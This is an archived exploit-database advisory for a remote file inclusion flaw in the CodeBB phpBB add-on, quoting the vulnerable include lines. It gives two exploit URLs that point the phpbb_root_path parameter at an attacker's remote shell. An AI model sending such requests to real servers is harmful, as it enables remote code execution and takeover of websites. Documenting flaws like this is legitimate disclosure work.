CodeBB 1.0 beta 2 (phpbb_root_path) Remote File Inclusion Vulnerability

# Title: CodeBB 1.0 beta 2 (phpbb_root_path) Remote File Inclusion Vulnerability
# EDB-ID: 3599
# CVE-ID: (2007-1839)
# OSVDB-ID: (35422)
# Author: Alkomandoz Hacker
# Published: 2007-03-28
# Verified: yes
# Download Exploit Code
# Download N/A

# codebb 1.1b3  (phpbb_root_path )Remote File Include Vulnerability

# D.Script: http://rd.cycnus.de/download/codebb-1.1b3.tar.bz2

# Discovered by: Alkomandoz Hacker

# Homepage: http://www.asb-may.net
# V.Code

# include_once($phpbb_root_path . 'includes/codebb/config.'.$phpEx);

require($phpbb_root_path . 'includes/codebb/scanners/scannerlist.'.$phpEx);



# Exploit:[Path]/codebb/pass_code.php?phpbb_root_path=SheLL

    [Path]/codebb/lang_select?phpbb_root_path=SheLL


# Greetz To: A-s-T Team & AsbMay's Group & KaBaRa & Mahmood_Ali & ThE-DE@TH & ToOoFa

# Thanx: asb-may.net & TrYaG.CoM

# milw0rm.com [2007-03-28]